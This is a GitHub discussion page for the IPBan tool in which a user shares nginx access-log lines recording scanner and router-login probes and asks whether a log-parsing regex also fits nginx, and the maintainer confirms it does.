34.77.163.42 - - [30/Apr/2021:20:47:53 +0800] "GET / HTTP/1.1" 444 0 "-" "python-requests/2.25.1"
194.62.6.193 - - [30/Apr/2021:20:56:30 +0800] "HEAD / HTTP/1.0" 444 0 "-" "-"
209.141.33.74 - - [30/Apr/2021:20:57:03 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 444 0 "http://125.160.120.137:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"

Does that regex also work with nginx's log? sorry didn't understand much about regex 😅. Thank you!

jjxtra · 2021-04-30T15:49:06Z

jjxtra
Apr 30, 2021
Maintainer Author

From what I can tell, yes: https://regex101.com/r/FKeEVw/1

0 replies

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Possible to add Apache logs to IPBan? #140

{{title}}

Replies: 2 comments 23 replies

{{title}}

{{title}}

{{title}}

{{title}}

{{title}}

{{editor}}'s edit

{{editor}}'s edit

{{title}}

{{editor}}'s edit

{{editor}}'s edit

{{title}}

{{editor}}'s edit

{{editor}}'s edit

Select a reply

Possible to add Apache logs to IPBan? #140

jjxtra Mar 12, 2021 Maintainer

Replies: 2 comments · 23 replies

jjxtra Mar 12, 2021 Maintainer Author

s-bourdon Mar 15, 2021

jjxtra Mar 15, 2021 Maintainer Author

s-bourdon Mar 16, 2021

jjxtra Mar 16, 2021 Maintainer Author

fahmiegerton Apr 30, 2021

jjxtra Apr 30, 2021 Maintainer Author

jjxtra
Mar 12, 2021
Maintainer

Replies: 2 comments 23 replies

jjxtra
Mar 12, 2021
Maintainer Author

jjxtra Mar 15, 2021
Maintainer Author

jjxtra Mar 16, 2021
Maintainer Author

jjxtra
Apr 30, 2021
Maintainer Author